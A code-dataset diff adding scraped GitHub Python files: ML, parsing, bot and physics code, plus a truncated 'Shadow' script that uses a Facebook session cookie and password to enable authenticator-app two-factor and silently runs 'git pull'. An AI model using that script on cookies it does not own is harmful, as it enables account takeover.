diff --git "a/2552.jsonl" "b/2552.jsonl"
new file mode 100644--- /dev/null
+++ "b/2552.jsonl"
@@ -0,0 +1,871 @@
+{"seq_id":"21937694093","text":"\nimport sys\nimport os\nsys.path.append('/cluster/home/rodamian/rt_prediction')\nsys.path.append('/Users/damiano/Desktop/Project_ML/rt_prediction')\n\nimport pandas as pd\nimport pickle\nfrom python.analysis.models import XGBoostModel, train_model\nimport os\nfrom python.analysis.constants import root, exp_names, data_path, exp_c, lengths\nfrom python.analysis.experiment import Experiment, MetaboliteDB, path_db\nimport glob\nimport multiprocessing as mp\ndata = pd.read_table(data_path, low_memory=False)\n\n\ndef get_cv_score(id=None, sel_feat=None, db=None, n_feat=30, n_params=50):\n\n if db is None:\n db = MetaboliteDB(path_db)\n exp = Experiment(id, db)\n\n if sel_feat is None:\n top_f = pickle.load(open(os.path.join(root, \"data\", \"sorted_feat\"), \"rb\"))\n # sel_feat_for_col = top_f.iloc[:, [exp.name in exp_c[col] for col in top_f]]\n sel_feat = top_f[\"all\"].tolist()\n\n m = XGBoostModel()\n features, rt = exp.get_features()\n cv_ratio = pd.DataFrame(columns=[exp.name], index=[\"train\", \"test\"])\n\n # Compute CV error for first n features all columns\n for i, feat in enumerate(sel_feat[0:n_feat]):\n current = sel_feat[0:(i+1)]\n\n if features.columns.isin(current).any() is False:\n current = sel_feat[0:(i + 2)]\n\n print(current)\n cv_ratio[i] = train_model(features[features.columns & current], rt.values.ravel(),\n m.parameters, m.model, n_params=n_params, n_jobs=1, ret_score=True)\n cv_ratio = cv_ratio.transpose()\n cv_ratio[\"ratio\"] = cv_ratio[\"test\"]/cv_ratio[\"train\"]\n\n # Check if directory exists otherwise create it\n if not os.path.exists(os.path.join(root, \"data\", \"cv\")):\n os.makedirs(os.path.join(root, \"data\", \"cv\"))\n\n with open(os.path.join(root, \"data\", \"cv\", \"c_\" + id), \"wb\") as f:\n pickle.dump(cv_ratio, f)\n f.close()\n\n\nif __name__ == \"__main__\":\n\n # Data cleaning\n feature_importance = pickle.load(open(os.path.join(root, \"data/feature_total\"), \"rb\"))\n feature_importance.fillna(0, inplace=True)\n feature_importance.index.rename(names=[\"features\", \"experiment\"], inplace=True)\n feature_importance.index = feature_importance.index.swaplevel()\n\n # Sum feature importance over experiment\n feature_over_exp = feature_importance.groupby(\"features\").apply(lambda x: x.abs().sum())\n\n # Sum feature importance over model\n feature_over_model = feature_over_exp.sum(axis=1)\n\n # Select top n features\n sorted_feat = pd.DataFrame(feature_over_model.sort_values(ascending=False).index.values, columns=[\"all\"])\n\n # top features for different columns\n for col in exp_c:\n\n summed_imp = feature_importance.loc[exp_c[col]].groupby(\"features\").apply(lambda x: x.abs().sum())\n feat_names = pd.DataFrame(summed_imp.sum(axis=1).sort_values(ascending=False).index.values, columns=[col])\n sorted_feat[col] = feat_names\n\n print(sorted_feat[0:20])\n\n with open(os.path.join(root, \"data\", \"sorted_feat\"), \"wb\") as f:\n pickle.dump(sorted_feat, f)\n f.close()\n\n with mp.Pool(mp.cpu_count()) as p:\n p.map(get_cv_score, exp_names)\n\n # Merging temporary databases\n with open(os.path.join(root, \"data\", \"cv_total\"), \"wb\") as c_total:\n cv_tot = pd.DataFrame()\n for f in glob.glob(os.path.join(root, \"data\", \"cv\", \"c_*\")):\n temp = pickle.load(open(f, \"rb\"))\n cv_tot = cv_tot.append(temp)\n\n pickle.dump(cv_tot, c_total)\n c_total.close()\n","repo_name":"rodamian/retention_time_prediction","sub_path":"compute_cv.py","file_name":"compute_cv.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19124548521","text":"from pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nimport time\n\ndb = MongoClient('localhost', 27017).eat\nbatch_no = 201910141402\n\n\ndef main():\n docs = db[\"ori_webpageinfo\"].find({\"batch_no\": {\"$ne\": batch_no}, \"spidername\": \"ZYSJ_FangJi_Spider\"})\n for doc in docs:\n soup = BeautifulSoup(doc['data'], features=\"lxml\")\n # 原料_MSJ\n if doc['url'].endswith('useful/') and db[\"material_info\"].find_one({\"refid\": doc['_id']}) is None:\n name = soup.title.string[0:soup.title.string.find('的营养')]\n pdoc = {\"title\": soup.title.string, \"name\": name, \"url\": doc['url'], \"refid\": doc['_id'], \"creattime\": time.time(), \"parse_no\": batch_no, \"nutrition\": []}\n curtitle = ''\n for p in soup.select('.wrap .space_left p'):\n if p.strong:\n curtitle = parse_key(p.strong.text)\n elif pdoc.get(curtitle):\n pdoc[curtitle] = pdoc[curtitle]+p.text\n else:\n pdoc[curtitle] = p.text\n #成份\n for n in soup.select('.wrap .space_right .category_use_table li'):\n item = n.text.split()\n if len(item) == 3:\n pdoc[\"nutrition\"].append({\"name\": item[0], \"val\": item[1], \"unit\": item[2]})\n db[\"material_info\"].insert_one(pdoc)\n\n upd_status = {\"$set\": {\"batch_no\": batch_no, \"last_parsetime\": time.time()}}\n db[\"ori_webpageinfo\"].update(doc, upd_status)\n\n if doc['spidername'] == 'zysj_zhongyao_spider' and db[\"yaocai_info\"].find_one({\"refid\": doc['_id']}) is None:\n if soup.title and soup.title.string.find('_中药材')>=0:\n contentbox = soup.select('#content')[0];\n # name = contentbox.find(\"h1\").string\n pdoc = {\"title\": soup.title.string, \"url\": doc['url'], \"refid\": doc['_id'], \"creattime\": time.time(), \"parse_no\": batch_no, \"recodes\": []}\n curRecode = {}\n curkey = None\n for child in contentbox.children:\n if child.name == 'h1':\n pdoc[\"name\"] = child.string\n if child.name == 'h2':\n if 'refbook' in curRecode:\n pdoc['recodes'].append(curRecode)\n curRecode = {}\n if child.name == 'p':\n if 'class' in child.attrs:\n if 'drug' in child.attrs['class']:\n curkey = child.attrs['class'][1]\n child.select(\".fieldname\")[0].clear()\n if curkey == 'tp':\n pdoc['img'] = child.find(\"img\").attrs['data-popbigimg']\n else:\n curRecode[parse_zysj_key(curkey)] = child.text\n else:\n print(\"#WARNNING 异常段落 :\\n\")\n print(child)\n else:\n curRecode[parse_zysj_key(curkey)] = curRecode[parse_zysj_key(curkey)] + '\\n' + child.text\n if curRecode not in pdoc['recodes']:\n pdoc['recodes'].append(curRecode)\n\n db[\"yaocai_info\"].insert_one(pdoc)\n upd_status = {\"$set\": {\"batch_no\": batch_no, \"last_parsetime\": time.time()}}\n db[\"ori_webpageinfo\"].update(doc, upd_status)\n\n if doc['spidername'] == 'ZYSJ_FangJi_Spider' and db[\"yaofang_info\"].find_one({\"refid\": doc['_id']}) is None:\n if soup.title and soup.title.string.find('_中药方剂') >= 0:\n contentbox = soup.select('#content')[0];\n pdoc = {\"title\": soup.title.string, \"url\": doc['url'], \"refid\": doc['_id'], \"creattime\": time.time(),\n \"parse_no\": batch_no}\n curkey = None\n name = None\n for child in contentbox.children:\n if child.name == 'h1':\n name = child.string\n pdoc[\"name\"] =name\n if child.name == 'h2':\n if 'refbook' in pdoc: # 第二本,存第一本\n db[\"yaofang_info\"].insert_one(pdoc)\n pdoc = {\"title\": soup.title.string, \"url\": doc['url'], \"refid\": doc['_id'], \"creattime\": time.time(), \"parse_no\": batch_no, \"name\": name}\n if child.name == 'p':\n if 'class' in child.attrs:\n if 'drug' in child.attrs['class']:\n curkey = child.attrs['class'][1]\n child.select(\".fieldname\")[0].clear()\n pdoc[parse_zysj_key(curkey)] = child.text\n else:\n print(\"#WARNNING 异常段落 :\\n\")\n print(child)\n else:\n pdoc[parse_zysj_key(curkey)] = pdoc[parse_zysj_key(curkey)] + '\\n' + child.text\n #最后一本,只有一本时的第一本\n db[\"yaofang_info\"].insert_one(pdoc)\n upd_status = {\"$set\": {\"batch_no\": batch_no, \"last_parsetime\": time.time()}}\n db[\"ori_webpageinfo\"].update(doc, upd_status)\n\ndef parse_key(title):\n return {\n '食材简介': 'intro',\n '营养价值': 'nutritional',\n '食用功效': 'function',\n '适用人群': 'fit_for',\n '禁忌人群': 'avoid_for',\n '选购技巧': 'how_buy',\n '存储简述': 'store',\n '其它相关说明': 'appendix'\n }.get(title, title)\ndef parse_zysj_key(ky):\n return {\n 'py': 'pinyin',\n 'ywm': 'enname',\n 'bm': 'alias',\n 'cc': 'ref',\n 'ly': 'birth',\n 'yxt': 'model',\n 'sjfb': 'place',\n 'xz': 'character',\n 'gnzz': 'function',\n 'yfyl': 'usemethod',\n 'gjls': 'appendix',\n 'zl': 'refbook',\n 'xw': 'xinwei',\n 'ff': 'usewith',\n 'zy': 'attention',\n 'hxcf': 'chemial',\n 'dx': 'by-effect',\n 'jb': 'recognize',\n 'pz': 'produce',\n 'gj': 'guijin',\n 'zc': 'store',\n 'lcyy': 'applyfor',\n 'bz': 'memo',\n 'cf': 'construction',\n 'zf': 'produce'\n }.get(ky, ky)\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n\n","repo_name":"amwanfwbx/cn-medicine","sub_path":"data/py/eatspiders/webpageparser.py","file_name":"webpageparser.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24723490307","text":"import pyautogui\r\nimport time\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #screenWidth, screenHeight = pyautogui.size() \r\n #print(\"scrwidth:{}-scrheight:{}\".format(screenWidth, screenHeight))\r\n\r\n ############################### way 1 to move and click ################\r\n pyautogui.moveTo(280, 750) \r\n pyautogui.click() \r\n time.sleep(2)\r\n\r\n\r\n ####################### 2 ####################################\r\n def ball_check():\r\n im = pyautogui.screenshot()\r\n #for i in range(320, 600, 5):\r\n #r, g, b = im.getpixel((425, i))\r\n #if r == g == b == 255:\r\n #return True\r\n #r, g, b = im.getpixel((430, i+10))\r\n #r2, g2, b2 = im.getpixel((425, i))\r\n #if (r2 > 250) & (g2 > 250) & (b2 > 250) & (b > 100)\r\n #return True\r\n #return False\r\n for i in range(420, 435):\r\n \tif (im.getpixel((i, 609)) == (114, 136, 5)):\r\n \t\treturn True\r\n return False\r\n\r\n############3\r\n while(1):\r\n if(ball_check()):\r\n pyautogui.press('space')\r\n time.sleep(.05)\r\n \r\n \r\n\r\n\r\n ","repo_name":"amirkasra007/Telegram_Games","sub_path":"football_star_auto.py","file_name":"football_star_auto.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38109928302","text":"# Define your api key as an environment variable\nimport os \n\n\nos.environ['WORDS_API_KEY'] = 'your_api_key'\n# ----------------------------------------------\n# Or use the Dictionary class\nfrom wordsapy import Dictionary\n\n\ndictionary = Dictionary(api_key='your_api_key')\n# or\ndictionary = Dictionary()\ndictionary.api_key = 'your_api_key'\n# ----------------------------------------------\n# Or the WordsapyClient class\nfrom wordsapy import WordsapyClient\n\n\nclient = WordsapyClient(api_key='your_api_key')\n# or\nclient = WordsapyClient()\nclient.api_key = 'your_api_key'\n# ----------------------------------------------\n# when using any of these classes the api key \n# will be defined as an environment variable, \n# so with doing it only once is more than enough","repo_name":"BackrndSource/wordsapy","sub_path":"examples/api_key.py","file_name":"api_key.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"43480954526","text":"''''\r\nThe svd method is a way to convert an (m x n) rectangular matrix to \r\nan equivalent form that is almost a diagonal form\r\n to Achieve this we use the tasformation\r\n\r\n S = U^T.A.V, where U and V are (m x m) and (n x n) orthogonal \r\n matrices respectively.\r\n If we choose the matrix A^T.A , we'll find it to be symmetric and can be \r\n eigen value decomposed using any standard method where \r\n A^T.A will be diagonalized by V, while similarly A.A^T will be\r\n diagonalized U.\r\n '''\r\nimport numpy as np\r\nimport numpy.linalg as l\r\nimport timeit as t\r\n\r\nA = np.array([[0,1,1],[0,1,0],[1,1,0],[0,1,0],[1,0,1]],dtype = np.float64)\r\nATA = np.dot(np.transpose(A),A)\r\nAAT = np.dot(A,np.transpose(A))\r\n\r\ndef check_diagonal(D):\r\n\terror_threshold = 1.0e-8\r\n\tfor i in range(D.shape[0]):\r\n\t\tfor j in range(D.shape[1]):\r\n\t\t\tif(i!=j):\r\n\t\t\t\tif(abs(D[i,j])>=error_threshold): \r\n\t\t\t\t\treturn False\r\n\t\t\telse:\t\r\n\t\t\t\tcontinue\r\n\treturn True\r\n\r\n'''\r\nTransformer Finds the corresponding Diagonalizing matrices by QR itteration.\r\n'''\r\ndef transformer(D):\r\n\tS = np.identity(D.shape[0],dtype = np.float64)\r\n\twhile(check_diagonal(D) == False):\r\n\t\tQ = l.qr(D)[0]\r\n\t\tS = np.dot(S,Q)\r\n\t\tD = np.dot(np.transpose(Q),np.dot(D,Q))\r\n\treturn S\r\n\r\nV = transformer(ATA)\r\nU = transformer(AAT)\r\n#We obtain SVD by direct transformation formula\r\nS = np.dot(np.transpose(U),np.dot(A,V))\r\nfor i in range(S.shape[0]):\r\n\tfor j in range(S.shape[1]):\r\n\t\tif(abs(S[i,j])<=1.0e-6):\r\n\t\t\tS[i,j] = 0.0\r\nprint(\"SVD Matrix by direct computation:\\n\",S,\"\\n\")\r\nprint(\"Time Taken = \",t.timeit(),\"\\n\")\r\nprint(\"SVD Diagonal elements by function:\\n\",l.svd(A)[1],\"\\n\")\r\nprint(\"Time Taken = \",t.timeit())\r\n\r\n'''\r\nThe SVD Values obtained via direct theoretical calculation and using \r\npackage differ due to the fact that the SVD values are square roots of the\r\neigenvalues of A^T.A or A.A^T, so there is a particular freedom to choose\r\nthe particular sign.\r\n\r\nSince we used the method to find the transformer so it might yield a negative,\r\nThe functional Module uses the method to find Eigen Values and by convention made positive. \r\n'''","repo_name":"RounakChatterjee/SEM2_AssignmentI","sub_path":"svd_decomp.py","file_name":"svd_decomp.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74153617153","text":"import copy\nimport functools\nimport random\n\nimport yaml\n\nfrom tf_pwa.amp import (\n DecayChain,\n DecayGroup,\n get_decay,\n get_particle,\n split_particle_type,\n)\n\nfrom .base_config import BaseConfig\n\n\ndef set_min_max(dic, name, name_min, name_max):\n if name not in dic and name_min in dic and name_max in dic:\n dic[name] = (\n random.random() * (dic[name_max] - dic[name_min]) + dic[name_min]\n )\n\n\nclass DecayConfig(BaseConfig):\n def __init__(self, dic, share_dict={}):\n self.config = dic\n self.share_dict = share_dict\n self.particle_key_map = {\n \"Par\": \"P\",\n \"m0\": \"mass\",\n \"g0\": \"width\",\n \"J\": \"J\",\n \"P\": \"P\",\n \"spins\": \"spins\",\n \"bw\": \"model\",\n \"model\": \"model\",\n \"bw_l\": \"bw_l\",\n \"running_width\": \"running_width\",\n }\n self.decay_key_map = {\"model\": \"model\"}\n self.dec = self.decay_item(self.config[\"decay\"])\n (\n self.particle_map,\n self.particle_property,\n self.top,\n self.finals,\n ) = self.particle_item(self.config[\"particle\"], share_dict)\n self.full_decay = DecayGroup(\n self.get_decay_struct(\n self.dec,\n self.particle_map,\n self.particle_property,\n self.top,\n self.finals,\n )\n )\n self.decay_struct = DecayGroup(self.get_decay_struct(self.dec))\n\n @staticmethod\n def load_config(file_name, share_dict={}):\n if isinstance(file_name, dict):\n return copy.deepcopy(file_name)\n if isinstance(file_name, str):\n if file_name in share_dict:\n return DecayConfig.load_config(share_dict[file_name])\n with open(file_name) as f:\n ret = yaml.safe_load(f)\n if ret is None:\n ret = {}\n return ret\n raise TypeError(\"not support config {}\".format(type(file_name)))\n\n def get_decay(self, full=True):\n if full:\n return self.full_decay\n else:\n return self.decay_struct\n\n @staticmethod\n def _list2decay(core, outs):\n parts = []\n params = {}\n for j in outs:\n if isinstance(j, dict):\n for k, v in j.items():\n params[k] = v\n else:\n parts.append(j)\n dec = {\"core\": core, \"outs\": parts, \"params\": params}\n return dec\n\n @staticmethod\n def decay_item(decay_dict):\n decs = []\n for core, outs in decay_dict.items():\n is_list = [isinstance(i, list) for i in outs]\n if all(is_list):\n for i in outs:\n dec = DecayConfig._list2decay(core, i)\n decs.append(dec)\n else:\n dec = DecayConfig._list2decay(core, outs)\n decs.append(dec)\n return decs\n\n @staticmethod\n def _do_include_dict(d, o, share_dict={}):\n s = DecayConfig.load_config(o, share_dict)\n for i in s:\n if i in d:\n if isinstance(d[i], dict):\n s[i].update(d[i])\n d[i] = s[i]\n else:\n d[i] = s[i]\n\n @staticmethod\n def particle_item_list(particle_list):\n particle_map = {}\n particle_property = {}\n for particle, candidate in particle_list.items():\n if isinstance(candidate, list): # particle map\n if len(candidate) == 0:\n particle_map[particle] = []\n for i in candidate:\n if isinstance(i, str):\n particle_map[particle] = particle_map.get(\n particle, []\n ) + [i]\n elif isinstance(i, dict):\n map_i, pro_i = DecayConfig.particle_item_list(i)\n for k, v in map_i.items():\n particle_map[k] = particle_map.get(k, []) + v\n particle_property.update(pro_i)\n else:\n raise ValueError(\n \"value of particle map {} is {}\".format(i, type(i))\n )\n elif isinstance(candidate, dict):\n particle_property[particle] = candidate\n else:\n raise ValueError(\n \"value of particle {} is {}\".format(\n particle, type(candidate)\n )\n )\n return particle_map, particle_property\n\n @staticmethod\n def particle_item(particle_list, share_dict={}):\n top = particle_list.pop(\"$top\", None)\n finals = particle_list.pop(\"$finals\", None)\n includes = particle_list.pop(\"$include\", None)\n if includes:\n if isinstance(includes, list):\n for i in includes:\n DecayConfig._do_include_dict(\n particle_list, i, share_dict=share_dict\n )\n elif isinstance(includes, str):\n DecayConfig._do_include_dict(\n particle_list, includes, share_dict=share_dict\n )\n else:\n raise ValueError(\n \"$include must be string or list of string not {}\".format(\n type(includes)\n )\n )\n particle_map, particle_property = DecayConfig.particle_item_list(\n particle_list\n )\n\n if isinstance(top, dict):\n particle_property.update(top)\n if isinstance(finals, dict):\n particle_property.update(finals)\n return particle_map, particle_property, top, finals\n\n def rename_params(self, params, is_particle=True):\n ret = {}\n if is_particle:\n key_map = self.particle_key_map\n else:\n key_map = self.decay_key_map\n for k, v in params.items():\n ret[key_map.get(k, k)] = v\n return ret\n\n def get_decay_struct(\n self,\n decay,\n particle_map=None,\n particle_params=None,\n top=None,\n finals=None,\n ):\n \"\"\" get decay structure for decay dict\"\"\"\n particle_map = particle_map if particle_map is not None else {}\n particle_params = (\n particle_params if particle_params is not None else {}\n )\n\n particle_set = {}\n\n def add_particle(name):\n if name in particle_set:\n return particle_set[name]\n params = particle_params.get(name, {})\n params = self.rename_params(params)\n set_min_max(params, \"mass\", \"m_min\", \"m_max\")\n set_min_max(params, \"width\", \"g_min\", \"g_max\")\n part = get_particle(name, **params)\n particle_set[name] = part\n return part\n\n def wrap_particle(name):\n name_list = particle_map.get(name, [name])\n return [add_particle(i) for i in name_list]\n\n def all_combine(out):\n if len(out) < 1:\n yield []\n else:\n for i in out[0]:\n for j in all_combine(out[1:]):\n yield [i] + j\n\n decs = []\n for dec in decay:\n core = wrap_particle(dec[\"core\"])\n outs = [wrap_particle(j) for j in dec[\"outs\"]]\n for i in core:\n for j in all_combine(outs):\n dec_i = get_decay(i, j, **dec[\"params\"])\n decs.append(dec_i)\n\n top_tmp, finals_tmp = set(), set()\n if top is None or finals is None:\n top_tmp, res, finals_tmp = split_particle_type(decs)\n if top is None:\n top_tmp = list(top_tmp)\n assert len(top_tmp) == 1, \"not only one top particle\"\n top = list(top_tmp)[0]\n else:\n if isinstance(top, str):\n top = particle_set[top]\n elif isinstance(top, dict):\n keys = list(top.keys())\n assert len(keys) == 1\n top = particle_set[keys.pop()]\n else:\n return particle_set[str(top)]\n if finals is None:\n finals = list(finals_tmp)\n elif isinstance(finals, (list, dict)):\n finals = [particle_set[i] for i in finals]\n else:\n raise TypeError(\"{}: {}\".format(finals, type(finals)))\n\n dec_chain = top.chain_decay()\n ret = []\n for i in dec_chain:\n if sorted(DecayChain(i).outs) == sorted(finals):\n ret.append(i)\n return ret\n","repo_name":"zhaoruoping/tf_pwa","sub_path":"tf_pwa/config_loader/decay_config.py","file_name":"decay_config.py","file_ext":"py","file_size_in_byte":8776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23577991531","text":"\t\n\n# Import the file as a list of lines:\n\n# def sortString(stringArr):\t\n# \toutput=[];\n# \treturn output;\n\n\n\nfile_in = 'in.txt'\nfile_out = 'out.txt'\n\nwith open(file_in,'rb') as fin, open(file_out,'wb') as fout:\n\t\n\tlines = fin.read().splitlines()\n\tcase = 1\n\tcases=int(lines[0])\n\tlines=lines[1:]\n\tindex=0;\n\n\tfor i in range(cases):\n\t\tcase = i+1\n\t\trC=lines[index].split();\n\n\t\td=int(rC[0]);\n\t\tn=int(rC[1]);\n\t\tindex=index+1;\n\t\tt1=0;\n\t\tfor j in range(n):\n\t\t\tps=lines[index].split();\n\t\t\tp=int(ps[0]);\n\t\t\ts=int(ps[1]);\n\n\t\t\ttempT=(d-p)/float(s);\n\t\t\tt1=max(t1,tempT);\n\t\t\tindex=index+1;\n\t\tspeed=d/t1;\n\n\t\tspeed='{0:.6f}'.format(speed)\n\t\t\n\t\toutput = 'Case #%d: %s\\n' % (case,speed)\n\t\t\n\t\t# output=str(r);\n\t\t# fout.write(output)\n\t\t# index=index+n; \n\n\t\t\n\n\n\t\tfout.write(output)\n\t\t\n\t\t\n\n\t# print (lines)\n\n\t\t\n\n\n\n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/1068.py","file_name":"1068.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40162847527","text":"from discord.ext import commands\nimport discord\nimport main as m\n\nconfig = m.readConfig()\n\n\n@commands.command(\n name=\"ip\",\n alias=['ips', 'server', 'servers'],\n description=\"Returns the IPs of Ebrius' Servers\",\n usage=\"\"\n)\nasync def ip(ctx):\n ipEmbed = discord.Embed(\n title=\"Server IPs\",\n color=discord.Color.green\n )\n\n ipEmbed.add_field(\n name=\"Survival\",\n value=config['survivalIP'],\n inline=False)\n ipEmbed.add_field(\n name=\"Creative\",\n value=config['creativeIP'],\n inline=False)\n ipEmbed.add_field(\n name=\"Events\",\n value=config['eventsIP'],\n inline=False)\n\n await ctx.send(embed=ipEmbed)\n\n\ndef setup(bot):\n bot.add_command(ip)\n","repo_name":"Sadeeed/discordbot","sub_path":"plugins/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40283755024","text":"from dataclasses import dataclass\n\nfrom ..services.database import Database\n\n\n@dataclass\nclass InstructorInfoParameter(object):\n \"\"\"\n Auxiliary class to handle the high amount of class parameters.\n \"\"\"\n instructor_id: str\n instructor_name: str\n department_id: str\n\n\nclass InstructorInfo(Database.get_db().Model):\n __tablename__ = \"UniversityServiceInstructorInfo\"\n InstructorID = Database.get_db().Column(\n Database.get_db().Integer(),\n autoincrement=True,\n nullable=False,\n primary_key=True\n )\n InstructorName = Database.get_db().Column(\n Database.get_db().String(255),\n nullable=False\n )\n DepartmentID = Database.get_db().Column(\n Database.get_db().String(255),\n nullable=False\n )\n __table_args__ = (\n Database.get_db().Index('UniversityServiceInstructorInfoIndex', InstructorID, DepartmentID),\n )\n\n def __init__(self, instructor_name, department_id):\n self.InstructorName = instructor_name\n self.DepartmentID = department_id\n\n @staticmethod\n def save(instructor_name, department_id):\n instructor_info = InstructorInfo(instructor_name, department_id)\n instructor_info._create()\n return instructor_info\n\n def _create(self):\n try:\n with Database.session_manager() as session:\n session.add(self)\n except Exception:\n print(f\"[DB] Failed to create in: {self.__tablename__}\")\n\n @staticmethod\n def delete_all():\n \"\"\"\n https://docs.sqlalchemy.org/en/14/orm/session_basics.html#orm-expression-update-delete\n :return:\n \"\"\"\n\n try:\n with Database.session_manager() as session:\n session.query(InstructorInfo).delete()\n except Exception:\n print(f\"[DB] Failed to clear Instructor information from table\")\n\n @staticmethod\n def init_app():\n print(\"[DB] Instructor Info Table initialisation done\")\n","repo_name":"rera5078/studyBuff","sub_path":"universityService/src/externalServices/database/tables/universityServiceInstructorInfo.py","file_name":"universityServiceInstructorInfo.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20198054828","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n\r\nCopyright (c) 2022 Abid Hussain\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\r\n\"\"\"\r\n\r\nimport requests as req, re\r\nfrom bs4 import BeautifulSoup as par\r\nimport rich as rich\r\n\r\n__import__('os').system('git pull')\r\n\r\nheaders = {\r\n\t\"Host\":\"mbasic.facebook.com\",\r\n\t\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n\t\"accept-language\":\"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7\",\r\n\t\"origin\":\"https://www.facebook.com\",\r\n\t\"referer\":\"https://www.facebook.com\",\r\n\t\"sec-ch-ua\":'\";Not A Brand\";v=\"99\", \"Chromium\";v=\"94\"',\r\n\t\"upgrade-insecure-requests\":\"1\",\r\n\t\"user-agent\":\"Mozilla/5.0 (Mobile; rv:48.0; A405DL) Gecko/48.0 Firefox/48.0 KAIOS/2.5\"\r\n}\r\n\r\nses = req.Session()\r\nses.headers.update(headers)\r\n\r\nclass Main(object):\r\n\t\r\n\tdef __init__(self,coki):\r\n\t\tself.coki = {\"cookie\":coki}\r\n\tdef logo(self):\r\n\t\tlogo = \"\"\"\r\n\r\n _____ _ _ \r\n/ ___| | | | \r\n\\ `--.| |__ __ _ __| | _____ __\r\n `--. \\ '_ \\ / _` |/ _` |/ _ \\ \\ /\\ / /\r\n/\\__/ / | | | (_| | (_| | (_) \\ V V / \r\n\\____/|_| |_|\\__,_|\\__,_|\\___/ \\_/\\_/ \r\n \r\n Tools enable a2f Facebook, \\x1b[0;92mv1.0.0\\x1b[0;97m\r\n\tDeveloper: SHADOW HACKER, Team: BLACK_HAT\r\n\t\t\"\"\"\r\n\t\treturn logo\r\n\tdef cek(self):\r\n\t\ttry:\r\n\t\t\tr = par(\r\n\t\t\t\tses.get(\r\n\t\t\t\t\t\"https://mbasic.facebook.com/security/2fac/setup/intro/metadata/?source=1\",cookies=self.coki\r\n\t\t\t\t).text, 'html.parser'\r\n\t\t\t)\r\n\t\texcept req.exceptions.TooManyRedirects:\r\n\t\t\tr = par(\r\n\t\t\t\treq.get(\r\n\t\t\t\t\t\"https://mbasic.facebook.com/security/2fac/setup/intro/metadata/?source=1\",cookies=self.coki\r\n\t\t\t\t).text, 'html.parser'\r\n\t\t\t)\r\n\t\ttry:\r\n\t\t\tlanjut = r.find(\r\n\t\t\t\t\"a\",string=\"Use Authentication App\"\r\n\t\t\t).get(\r\n\t\t\t\t\"href\"\r\n\t\t\t)\r\n\t\texcept:\r\n\t\t\texit(\" ! your account is already installed a2f ×\")\r\n\t\ttry:\r\n\t\t\t__r = ses.get(lanjut,cookies=self.coki).text\r\n\t\texcept req.exceptions.TooManyRedirects:\r\n\t\t\t__r = req.get(lanjut,cookies=self.coki).text\r\n\t\tco = par(__r, 'html.parser')\r\n\t\ttry:\r\n\t\t\tkode = self.get_kode(co)\r\n\t\t\tprint(\"\\n * Key authen:\",kode,\"\\n * Enter the authentic key in the authentic app 2 faktor!\\n\")\r\n\t\texcept:\r\n\t\t\tif \"For security, please re-enter your password to continue.\" in __r:\r\n\t\t\t\tprint(\" * For security, please enter your Facebook password to continue.\")\r\n\t\t\t\tsandi = input(\" + Password facebook: \")\r\n\t\t\t\tlanjut = co.find(\r\n\t\t\t\t\t'form',{\r\n\t\t\t\t\t\t'method':'post'\r\n\t\t\t\t\t}\r\n\t\t\t\t)\r\n\t\t\t\tmemek = {}\r\n\t\t\t\tlst = [\"fb_dtsg\",\"jazoest\",\"save\"]\r\n\t\t\t\tfor x in lanjut:\r\n\t\t\t\t\tif x.get(\"name\") in 